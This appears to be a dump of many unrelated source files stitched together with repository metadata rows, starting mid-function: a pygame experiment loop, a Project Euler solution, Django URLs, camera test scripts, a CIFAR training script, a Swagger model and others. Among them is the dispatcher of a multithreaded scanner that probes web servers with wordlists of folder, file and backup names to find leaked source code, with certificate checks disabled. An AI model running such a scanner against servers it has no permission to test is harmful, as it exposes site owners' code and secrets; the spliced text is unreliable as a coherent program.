noisePlayerGrid, realAction = self.normalNoise(realPlayerGrid, aimAction, noiseStep, stepCount)
if noisePlayerGrid in obstacles:
noisePlayerGrid = tuple(trajectory[-1])
realPlayerGrid = self.checkBoundary(noisePlayerGrid)
self.drawNewState(bean1Grid, bean2Grid, realPlayerGrid, obstacles)
trajectory.append(list(realPlayerGrid))
aimActionList.append(aimAction)
aimPlayerGridList.append(aimPlayerGrid)
pause = checkTerminationOfTrial(bean1Grid, bean2Grid, realPlayerGrid)
pg.time.wait(500)
pg.event.set_blocked([pg.KEYDOWN, pg.KEYUP])
results["reactionTime"] = str(reactionTime)
results["trajectory"] = str(trajectory)
results["aimPlayerGridList"] = str(aimPlayerGridList)
results["aimAction"] = str(aimActionList)
results["noisePoint"] = str(noiseStep)
results["goal"] = str(goalList)
return results
| [
"shaozhecheng@outlook.com"
] | shaozhecheng@outlook.com |
f8b009384d048023c27af00144f2eed20a7e0cf7 | 64363c8f80d760045996cbda1e0f578c07378c5b | /1-50/problem12/problem12.py | fce34ccd85da4c311a28f9a29d21512305111dbb | [] | no_license | ducngtuan/euler | ad1dd05cb044a067d0ab029ea7531128260b0d11 | c362d134dff02f639eae1c38508bc0f5cfdba07b | refs/heads/master | 2020-12-24T15:58:56.125110 | 2013-02-03T12:22:10 | 2013-02-03T12:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | def generate(n, acc=0):
if n == 0:
return acc
if n % 2 == 1:
return generate(n - 1, n + acc)
return acc + n * (n + 1) / 2
def divisors_count(n):
sqrt = int(n**0.5)
count = len([x for x in range(1, sqrt) if n % x == 0]) * 2
if sqrt * sqrt == n: count +=1
return count
i = 1
while divisors_count(generate(i)) <= 500: i += 1
print("%d: %d" % (i, generate(i))) # 12375 - 76576500 | [
"duc.ngtuan@googlemail.com"
] | duc.ngtuan@googlemail.com |
a07da680c32548d6d654f4d01f59d3f272342446 | 6e2dcf256edb612c76e734ced750285d8fcc3233 | /FirstProject/urls.py | ed0bdf1c26ceec833f9828075af4f3c449c0b58b | [] | no_license | ShubhamWorks78/DjangoFirst | 2a49f4372caed0208959281143c25fdcf2a1cb84 | 6f853d305bb7fa645f6d3817b33b53de151b29e6 | refs/heads/master | 2021-05-02T15:57:17.979561 | 2016-11-01T20:07:08 | 2016-11-01T20:07:08 | 72,571,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 820 | py | """FirstProject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include,url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^music/',include('music.urls')),
]
| [
"2014UGEC@nitjsr.ac.in"
] | 2014UGEC@nitjsr.ac.in |
24bfed80ab1caa8cbdcf840494dd356d0bacce80 | 6bca587e888ad96062e7d74f96e28e05f2da51a6 | /android/device/actions/common/hardware/libcamera/tests/camerahal_test_scripts/camera_smoketest/camera_smoketest_0011.py | d158fa5ccec3b848d9ec519d7db1d050f485d942 | [] | no_license | ChrisP-Android/android-actions | 07a3bd732cb731ac6176b768b1ce19e5f520a303 | ac57ff55fbca5f4e3cf8851b17c42dafa2f9f46c | refs/heads/master | 2020-12-14T18:51:47.340113 | 2015-10-28T17:42:12 | 2015-10-28T17:42:12 | 44,614,459 | 1 | 0 | null | 2015-10-20T15:07:25 | 2015-10-20T15:07:25 | null | UTF-8 | Python | false | false | 772 | py |
import time
from time import sleep
import random
import sys
from config import *
from camera_smoketest_config import *
############################################################
print '*******************************************************************'
print 'recording %d times'% TestIterTimes
print '*******************************************************************'
device.startActivity(component=runComponent)
wait(open_wait)
for s in range(2):
RestoreDefaults()
wait(2)
device.touch( CamcorderMode.x, CamcorderMode.y, 'DOWN_AND_UP')
sleep(2)
for i in range(TestIterTimes):
print 'recording No.%d'%i
StartRecording();
wait(random.randint(1,5));
StopRecording();
SwitchCamera()
wait(2)
exit()
| [
"lee.li@lemaker.com"
] | lee.li@lemaker.com |
f55df027f5a380a2302722b0a432c76857f85315 | a1a43879a2da109d9fe8d9a75f4fda73f0d7166b | /api/tests/equal_all.py | 1f1a1f3cf9a2c23dd214b96ee1e53b5c0fc00069 | [] | no_license | PaddlePaddle/benchmark | a3ed62841598d079529c7440367385fc883835aa | f0e0a303e9af29abb2e86e8918c102b152a37883 | refs/heads/master | 2023-09-01T13:11:09.892877 | 2023-08-21T09:32:49 | 2023-08-21T09:32:49 | 173,032,424 | 78 | 352 | null | 2023-09-14T05:13:08 | 2019-02-28T03:14:16 | Python | UTF-8 | Python | false | false | 1,661 | py | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from common_import import *
@benchmark_registry.register("equal_all")
class EqualAllConfig(APIConfig):
def __init__(self):
super(EqualAllConfig, self).__init__("equal_all")
self.run_tf = False
@benchmark_registry.register("equal_all")
class PaddleEqualAll(PaddleOpBenchmarkBase):
def build_graph(self, config):
x = self.variable(name='x', shape=config.x_shape, dtype=config.x_dtype)
y = self.variable(name='y', shape=config.y_shape, dtype=config.y_dtype)
result = paddle.equal_all(x=x, y=y)
self.feed_list = [x, y]
self.fetch_list = [result]
@benchmark_registry.register("equal_all")
class TorchEqualAll(PytorchOpBenchmarkBase):
def build_graph(self, config):
x = self.variable(name='x', shape=config.x_shape, dtype=config.x_dtype)
y = self.variable(name='y', shape=config.y_shape, dtype=config.y_dtype)
result = torch.equal(input=x, other=y)
result = torch.tensor(result)
self.feed_list = [x, y]
self.fetch_list = [result]
| [
"noreply@github.com"
] | noreply@github.com |
a100678014c55766c07b94ae81cf67b691c11c59 | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-sblp/sblp_ut=3.5_rd=1_rw=0.04_rn=4_u=0.075-0.325_p=harmonic-2/sched=RUN_trial=6/sched.py | 3605875026286563e51a9292de1d94125c66f6dc | [] | no_license | ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | -S 1 -X RUN -Q 0 -L 2 106 400
-S 0 -X RUN -Q 0 -L 2 86 400
-S 0 -X RUN -Q 0 -L 2 74 250
-S 0 -X RUN -Q 0 -L 2 59 250
-S 2 -X RUN -Q 1 -L 1 54 200
-S 3 -X RUN -Q 1 -L 1 44 175
-S 2 -X RUN -Q 1 -L 1 40 200
-S 2 -X RUN -Q 1 -L 1 37 125
-S 4 -X RUN -Q 2 -L 1 35 125
-S 4 -X RUN -Q 2 -L 1 33 125
-S 4 -X RUN -Q 2 -L 1 32 300
-S 4 -X RUN -Q 2 -L 1 30 100
-S 5 -X RUN -Q 3 -L 1 30 300
-S 5 -X RUN -Q 3 -L 1 28 150
-S 5 -X RUN -Q 3 -L 1 24 300
-S 5 -X RUN -Q 3 -L 1 19 125
| [
"ricardo.btxr@gmail.com"
] | ricardo.btxr@gmail.com |
346858d357244e5d68bd63d2933ad76895e0112c | 5f4cb8907900ebb740b5bd22c932ef7bbb847eb9 | /train.py | 0239e8b311f96c5390e162302512fb6528de344a | [] | no_license | DeeperCS/distillation | b3c13965142683324ae7846c7442f3da0f2739ac | a42a34ee17ccce8fc9319231d86a0ffd7f3d013d | refs/heads/master | 2022-12-20T21:36:02.750087 | 2020-09-28T09:53:40 | 2020-09-28T09:53:40 | 299,263,677 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,141 | py | from __future__ import print_function
import argparse
import numpy as np
import os
import shutil
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
from models import resnet
from models import densenet
from utils import get_logger, makedirs
# torch.cuda.set_device(3)
# Training settings
parser = argparse.ArgumentParser(description='PyTorch CIFAR training')
parser.add_argument('--dataset', type=str, default='cifar100',
help='training dataset (default: cifar100)')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=256, metavar='N',
help='input batch size for testing (default: 256)')
parser.add_argument('--epochs', type=int, default=160, metavar='N',
help='number of epochs to train (default: 160)')
parser.add_argument('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('--lr', type=float, default=0.1, metavar='LR',
help='learning rate (default: 0.1)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=100, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--save', default='./experiment1', type=str, metavar='PATH',
help='path to save model (default: current directory)')
parser.add_argument('--arch', default='resnet', type=str,
help='architecture to use')
parser.add_argument('--data', default='../ESNB-cifar/', type=str,
help='path of dataset')
parser.add_argument('--depth', default=20, type=int,
help='depth of the neural network')
parser.add_argument('--depth_dense', type=int, default=100, help='Model depth.')
parser.add_argument('--growthRate', type=int, default=12, help='Growth rate for DenseNet.')
parser.add_argument('--compressionRate', type=int, default=0.5, help='Compression Rate (theta) for DenseNet.')
parser.add_argument('--drop', '--dropout', default=0, type=float,
metavar='Dropout', help='Dropout ratio')
args = parser.parse_args()
makedirs(args.save)
logger = get_logger(logpath=os.path.join(args.save, 'logs'), filepath=os.path.abspath(__file__))
logger.info(args)
args.cuda = not args.no_cuda and torch.cuda.is_available()
num_blocks = [(args.depth-2)//(3*2),] * 3
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
data_path = args.data
kwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}
num_classes = 10
if args.dataset == 'cifar10':
train_loader = torch.utils.data.DataLoader(
datasets.CIFAR10('../data.cifar10', train=True, download=True,
transform=transforms.Compose([
transforms.Pad(4),
transforms.RandomCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
])),
batch_size=args.batch_size, shuffle=True, **kwargs)
test_loader = torch.utils.data.DataLoader(
datasets.CIFAR10('../data.cifar10', train=False, transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
])),
batch_size=args.test_batch_size, shuffle=True, **kwargs)
else:
num_classes = 100
train_loader = torch.utils.data.DataLoader(
datasets.CIFAR100(data_path+'data.cifar100', train=True, download=False,
transform=transforms.Compose([
transforms.Pad(4),
transforms.RandomCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
])),
batch_size=args.batch_size, shuffle=True, **kwargs)
test_loader = torch.utils.data.DataLoader(
datasets.CIFAR100(data_path+'data.cifar100', train=False, transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
])),
batch_size=args.test_batch_size, shuffle=True, **kwargs)
if args.arch == "resnet":
model = resnet.resnet(depth=args.depth, num_classes=num_classes, num_blocks=num_blocks)
else:
model = densenet.densenet(
num_classes=num_classes,
depth=args.depth_dense,
block=densenet.Bottleneck,
growthRate=args.growthRate,
compressionRate=args.compressionRate,
dropRate=args.drop,
)
logger.info(model)
if args.cuda:
model.cuda()
optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
logger.info("=> loaded checkpoint '{}' (epoch {}) Prec1: {:f}"
.format(args.resume, checkpoint['epoch'], best_prec1))
else:
logger.info("=> no checkpoint found at '{}'".format(args.resume))
def train(epoch):
model.train()
avg_loss = 0.
train_acc = 0.
for batch_idx, (data, target) in enumerate(train_loader):
if args.cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
optimizer.zero_grad()
output = model(data)
loss = F.cross_entropy(output, target)
avg_loss += loss.item()
pred = output.data.max(1, keepdim=True)[1]
train_acc += pred.eq(target.data.view_as(pred)).cpu().sum()
loss.backward()
optimizer.step()
if batch_idx % args.log_interval == 0:
logger.info('Train Epoch: {} [{}/{} ({:.1f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
def test():
model.eval()
test_loss = 0
correct = 0
total = 0
with torch.no_grad():
for data, target in test_loader:
if args.cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
output = model(data)
test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss
pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.data.view_as(pred)).cpu().sum().item()
total += target.size(0)
test_loss /= total
logger.info('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)'.format(
test_loss, correct, total, 100. * correct / total))
return (100. * correct / total)
def save_checkpoint(state, is_best, filepath):
torch.save(state, os.path.join(filepath, 'checkpoint.pth.tar'))
if is_best:
shutil.copyfile(os.path.join(filepath, 'checkpoint.pth.tar'), os.path.join(filepath, 'model_best.pth.tar'))
best_prec1 = 0.
for epoch in range(args.start_epoch, args.epochs):
if epoch in [args.epochs*0.25, args.epochs*0.5, args.epochs*0.75]:
for param_group in optimizer.param_groups:
param_group['lr'] *= 0.1
train(epoch)
prec1 = test()
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
logger.info("Best acc:{}\n".format(best_prec1))
save_checkpoint({
'epoch': epoch + 1,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
'optimizer': optimizer.state_dict(),
'cfg': model.cfg
}, is_best, filepath=args.save)
| [
"zy3381@vip.qq.com"
] | zy3381@vip.qq.com |
3f27767e32d95a71d36747e6db0b0d8e9bfabfc9 | f0a65d21d5ba16888f131fe99ed8baf0a85cf7dd | /pygmsh/volume_base.py | d3a22878fde32ff32a8b8924022e7a8096963a9b | [
"MIT"
] | permissive | mjredmond/pygmsh | d4a1e4e418af931eccbe73db01813a70efc2924a | 972e1164d77ecbf6c2b50b93fec9dc48c8d913e6 | refs/heads/master | 2021-01-19T07:52:53.057151 | 2017-04-06T09:48:21 | 2017-04-06T09:48:21 | 87,581,937 | 0 | 0 | null | 2017-04-07T19:52:56 | 2017-04-07T19:52:56 | null | UTF-8 | Python | false | false | 246 | py | # -*- coding: utf-8 -*-
#
class VolumeBase(object):
_ID = 0
def __init__(self, id=None):
if id:
self.id = id
else:
self.id = 'v%d' % VolumeBase._ID
VolumeBase._ID += 1
return
| [
"nico.schloemer@gmail.com"
] | nico.schloemer@gmail.com |
d220286422890246a7bfe05a56449454d42fa1d7 | 156d6f2187d875429482dd39b0daff7870b5b716 | /data/csv_to_json.py | 25c4f16b0b749b3f0d0504723000253414ae1219 | [] | no_license | ahardjasa/code2015 | 57ce282821ef9e3671022eaaae01941b8016d9ab | 1d2ab48698b259beb4d461e31c4b0db49b871363 | refs/heads/master | 2020-04-11T04:28:01.454528 | 2016-01-04T06:30:45 | 2016-01-04T06:30:45 | 31,090,410 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 686 | py | #!/usr/bin/env python3
import sys
import codecs
import csv
import json
def clean(text):
text = text.strip()
try:
return float(text)
except Exception:
return text
def main(filename):
with codecs.open(filename, encoding='latin_1') as ifh:
reader = csv.reader(ifh)
for i, row in enumerate(reader):
if i == 0:
print('{"cols": ' + json.dumps(row) + ',\n"rows": [')
else:
comma = ', '
if i == 1:
comma = ' '
print(comma + json.dumps([clean(c) for c in row]))
print(']}')
if __name__ == '__main__':
main(sys.argv[1])
| [
"ngentleman@gmail.com"
] | ngentleman@gmail.com |
049caefa2add1ff042074b59e8aa6f1d1253ec07 | b236cc8f8cb1551467fd7bfdfafd35b760e1beeb | /00-Scanner/01-RemoteFileScanner/01-CodeLeak/SourceLeakHacker/lib/core/dispatcher.py | 2a797bee0b02b44e0877d5be1dae1794d5cb169a | [] | no_license | LANVNAL/MyPentestToolsBox | d3e8fbe78d84878996f9bab663568045dba20f29 | b88c8bc711eb21fb14a06bcf816629477b5604cb | refs/heads/master | 2023-07-24T18:25:28.538528 | 2021-09-07T11:20:27 | 2021-09-07T11:20:27 | 403,949,673 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 7,176 | py | import sys
import queue
import threading
import time
import requests
from colorama import Style
from lib.util import color
from lib.util import terminal
from lib.context import context
def check(url, foldername, filename, backup, timeout=4):
try:
start_time = time.time()
response = requests.head(url, timeout=timeout, verify=False)
end_time = time.time()
code = response.status_code
if "Content-Length" in response.headers:
content_length = response.headers["Content-Length"]
else:
content_length = "0"
if "Content-Type" in response.headers:
content_type = response.headers["Content-Type"]
else:
content_type = "UNKNOWN"
time_used = end_time - start_time
context.result_lock.acquire()
context.result[url] = {
"code":code,
"headers":response.headers,
"time":time_used,
"Content-Length": content_length,
"Content-Type": content_type,
}
context.result_lock.release()
context.statistic_lock.acquire()
if code not in context.statistic.keys():
context.statistic[code] = 0
context.statistic[code] += 1
context.statistic_lock.release()
# Update cache
if code >= 200 and code < 300:
context.foldernames_lock.acquire()
context.foldernames_cache[foldername] += 1
context.foldernames_lock.release()
context.filenames_lock.acquire()
context.filenames_cache[filename] += 1
context.filenames_lock.release()
context.backups_lock.acquire()
context.backups_cache[backup] += 1
context.backups_lock.release()
context.screenLock.acquire()
print(color.projection(code) + "[%d]\t%s\t%02f\t%s\t%s" % (code, content_length, time_used, content_type, url))
print(Style.RESET_ALL, end="")
context.screenLock.release()
except Exception as e:
code = 0
context.result_lock.acquire()
context.result[url] = {
"code":code,
"time":0,
"Content-Length": 0,
"Content-Type": repr(e).replace(",", "|"),
}
context.result_lock.release()
context.logger.error(e)
context.statistic_lock.acquire()
if code not in context.statistic.keys():
context.statistic[code] = 0
context.statistic[code] += 1
context.statistic_lock.release()
raise e
class Producer(threading.Thread):
def __init__(self, Q, urls, foldernames_file, filenames_file, backups_file, timeout):
threading.Thread.__init__(self)
self.daemon = True
self.Q = Q
self.urls = urls
self.foldernames_file = foldernames_file
self.filenames_file = filenames_file
self.backups_file = backups_file
self.timeout = timeout
def run(self):
# Generate tasks for threads
context.logger.info("Loading dictionaries: 1/3")
for i in list(self.foldernames_file):
key = i.split("\t")[1].strip()
value = int(i.split("\t")[0])
context.foldernames_lock.acquire()
context.foldernames_cache[key] = value
context.foldernames_lock.release()
context.logger.info("Loading dictionaries: 2/3")
for i in list(self.filenames_file):
key = i.split("\t")[1].strip()
value = int(i.split("\t")[0])
context.filenames_lock.acquire()
context.filenames_cache[key] = value
context.filenames_lock.release()
context.logger.info("Loading dictionaries: 3/3")
for i in list(self.backups_file):
key = i.split("\t")[1].strip()
value = int(i.split("\t")[0])
context.backups_lock.acquire()
context.backups_cache[key] = value
context.backups_lock.release()
context.logger.info("Sorting dictionaries...")
for backup in sorted(context.backups_cache.items(), key=lambda item:item[1], reverse=True):
for foldername in sorted(context.foldernames_cache.items(), key=lambda item:item[1], reverse=True):
for url in self.urls:
# Check folder existance
folder_url = "{}{}".format(url, foldername[0])
skip_flag = False
try:
response = requests.head(folder_url, timeout=self.timeout, verify=False)
code = response.status_code
if code >= 400 and code < 500:
skip_flag = True
context.logger.info("Folder({}) not exists, skipping scanning files in this folder.".format(folder_url))
except Exception as e:
context.logger.error(repr(e))
if skip_flag:
continue
for filename in sorted(context.filenames_cache.items(), key=lambda item:item[1], reverse=True):
path = "{}{}".format(foldername[0], backup[0].replace("?", filename[0]))
u = "{}{}".format(url, path)
task = {
"url":u,
"timeout": self.timeout,
"retry":4,
"foldername": foldername[0],
"filename":filename[0],
"backup": backup[0],
}
if not context.CTRL_C_FLAG:
self.Q.put(task)
if context.CTRL_C_FLAG: break
if context.CTRL_C_FLAG: break
if context.CTRL_C_FLAG: break
context.FINISH_FLAG = True
class Consumer(threading.Thread):
def __init__(self, Q):
threading.Thread.__init__(self)
self.daemon = True
self.Q = Q
def run(self):
while True:
if self.Q.qsize() == 0 and context.FINISH_FLAG:
break
task = self.Q.get()
try:
check(task["url"], task["foldername"], task["filename"], task["backup"], task["timeout"])
except Exception as e:
# retry may cause dead lock, so disabled
# if task["retry"] > 0:
# task["retry"] -= 1
# self.Q.put(task)
# print("{}, eescheduling task: {}".format(repr(e), task))
pass
finally:
# Mark this task as done, whether an exception happened or not
self.Q.task_done()
def start(urls, foldernames_file, filenames_file, backups_file, threads_number, timeout):
Q = queue.Queue(maxsize=threads_number * 2)
producer = Producer(Q, urls, open(foldernames_file), open(filenames_file), open(backups_file), timeout)
producer.start()
for i in range(threads_number):
consumer = Consumer(Q)
consumer.start()
producer.join()
| [
"lanvnal@foxmail.com"
] | lanvnal@foxmail.com |
c1396ab21dabc56b8319ae076980db2b18e388c6 | e2e7b6ae6f8897a75aaa960ed36bd90aa0743710 | /swagger_client/models/post_deployment.py | 2e5931f02a8d25c5931c6afa88ad097e5ca01832 | [
"Apache-2.0"
] | permissive | radon-h2020/radon-ctt-cli | 36912822bc8d76d52b00ea657ed01b8bfcc5056f | 3120b748c73e99d81d0cac5037e393229577d640 | refs/heads/master | 2023-08-19T10:54:01.517243 | 2021-09-15T15:38:51 | 2021-09-15T15:38:51 | 299,571,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,461 | py | # coding: utf-8
"""
RADON CTT Server API
This is API of the RADON Continuous Testing Tool (CTT) Server: <a href=\"https://github.com/radon-h2020/radon-ctt\">https://github.com/radon-h2020/radon-ctt<a/> # noqa: E501
OpenAPI spec version: 1.0.0-oas3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class POSTDeployment(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'testartifact_uuid': 'str'
}
attribute_map = {
'testartifact_uuid': 'testartifact_uuid'
}
def __init__(self, testartifact_uuid=None): # noqa: E501
"""POSTDeployment - a model defined in Swagger""" # noqa: E501
self._testartifact_uuid = None
self.discriminator = None
self.testartifact_uuid = testartifact_uuid
@property
def testartifact_uuid(self):
"""Gets the testartifact_uuid of this POSTDeployment. # noqa: E501
:return: The testartifact_uuid of this POSTDeployment. # noqa: E501
:rtype: str
"""
return self._testartifact_uuid
@testartifact_uuid.setter
def testartifact_uuid(self, testartifact_uuid):
"""Sets the testartifact_uuid of this POSTDeployment.
:param testartifact_uuid: The testartifact_uuid of this POSTDeployment. # noqa: E501
:type: str
"""
if testartifact_uuid is None:
raise ValueError("Invalid value for `testartifact_uuid`, must not be `None`") # noqa: E501
self._testartifact_uuid = testartifact_uuid
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(POSTDeployment, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, POSTDeployment):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"duellmann@iste.uni-stuttgart.de"
] | duellmann@iste.uni-stuttgart.de |
1d8bc9d7b9f1f8b71aaa271d97fd4d185b45f925 | 8bb086072e203a802bb2e8a34ca611a7daaa3ce2 | /subject_selection/select_3T_subjs_with_short_scans.py | 05a709a416819ee2033cf26a9d12cca22a2ea8b7 | [] | no_license | Washington-University/HCPpipelinesXnatPbsJobs | b4826af8f35561be56538b45eef138df51ff6490 | 9658c6dd487064cc6184c819911fe1fdf1b7aca9 | refs/heads/master | 2021-06-28T11:40:53.092452 | 2020-11-13T18:29:52 | 2020-11-13T18:29:52 | 154,562,056 | 0 | 1 | null | 2019-05-06T15:13:57 | 2018-10-24T20:03:47 | Shell | UTF-8 | Python | false | false | 2,579 | py | #!/usr/bin/env python3
# import of built-in modules
import os
import sys
import subprocess
# import of third party modules
pass
# import of local modules
import hcp.hcp3t.archive as hcp3t_archive
import hcp.hcp3t.subject as hcp3t_subject
# authorship information
__author__ = "Timothy B. Brown"
__copyright__ = "Copyright 2016, The Human Connectome Project"
__maintainer__ = "Timothy B. Brown"
def _inform(msg):
"""Inform the user by writing out a message that is prefixed by the file name.
:param msg: Message to output
:type msg: str
"""
#print(os.path.basename(__file__) + ": " + msg)
print(msg)
def get_volume_count(file_name):
cmd = 'fslinfo ' + file_name
cmd += " | grep dim4 | head -1 | tr -s ' ' | cut -d ' ' -f 2"
completed_process = subprocess.run(cmd, shell=True, check=True, stdout=subprocess.PIPE, universal_newlines=True)
volume_count = int(completed_process.stdout)
return volume_count
def get_expected_volume_count(file_name):
file_base_name = os.path.basename(file_name)
#_inform("file_base_name: " + file_base_name)
(subject_id, session_classifier, dwi, dircount_str, pe_dir_and_suffix) = file_base_name.split('_')
dircount_str = dircount_str[3:]
#_inform("dircount_str: " + dircount_str)
return int(dircount_str)
def main():
archive = hcp3t_archive.Hcp3T_Archive()
project_names = ['HCP_500', 'HCP_900']
for project_name in project_names:
subject_ids = archive.available_subject_ids(project_name)
for subject_id in subject_ids:
subject_info = hcp3t_subject.Hcp3TSubjectInfo(project_name, subject_id)
available_diffusion_scan_fullpaths = archive.available_diffusion_scan_fullpaths(subject_info)
for diffusion_scan in available_diffusion_scan_fullpaths:
#_inform("")
volume_count = get_volume_count(diffusion_scan)
#_inform("diffusion_scan: " + diffusion_scan + " volume_count: " + str(volume_count))
expected_volume_count = get_expected_volume_count(diffusion_scan)
#_inform("diffusion_scan: " + diffusion_scan + " expected_volume_count: " + str(expected_volume_count))
if volume_count != expected_volume_count:
_inform("diffusion_scan: " + os.path.basename(diffusion_scan) +
" has expected volume count: " + str(expected_volume_count) +
" and actual volume count: " + str(volume_count))
if __name__ == "__main__":
main()
| [
"junilc@wustl.edu"
] | junilc@wustl.edu |
797a8815744350425e025a5f0309849676b9691c | e27333261b8e579564016c71d2061cc33972a8b8 | /.history/api/IR_engine_20210728213929.py | ddcc939eb070ba750cc5357a2d6a5aa401fe3e9a | [] | no_license | Dustyik/NewsTweet_InformationRetrieval | 882e63dd20bc9101cbf48afa6c3302febf1989b1 | d9a6d92b51c288f5bcd21ea1cc54772910fa58f7 | refs/heads/master | 2023-07-01T09:12:53.215563 | 2021-08-12T08:28:33 | 2021-08-12T08:28:33 | 382,780,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,136 | py | import pandas as pd
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.metrics.pairwise import euclidean_distances
from nltk.stem import PorterStemmer
from nltk.tokenize import word_tokenize
from IPython.display import display
'''
Functions to write:
1. tf-idf with cosine sim/Euclidean distance
- represent terms in each document with its tf-idf weights,
2. VSM with cosine sim/Euclidean distance
3. BIM
4. BM25
5. BERT
Test Titles:
f7ca322d-c3e8-40d2-841f-9d7250ac72ca Worcester breakfast club for veterans gives hunger its marching orders
609772bc-0672-4db5-8516-4c025cfd54ca Jumpshot Gives Marketers Renewed Visibility Into Paid and Organic Keywords With Launch of Jumpshot Elite
1aa9d1b0-e6ba-4a48-ad0c-66552d896aac The Return Of The Nike Air Max Sensation Has 80’s Babies Hyped!
719699f9-47be-4bc7-969b-b53a881c95ae This New Dating App Will Ruin Your Internet Game
Test Titles Stemmed:
worcest breakfast club for veteran give hunger it march order
jumpshot give market renew visibl into paid and organ keyword with launch of jumpshot elit
the return of the nike air max sensat ha s babi hype
thi new date app will ruin your internet game
'''
titles_file_path = r"D:\Desktop\IR_term_8\IR-tweets---disaster-\article_titles_stemmed.csv"
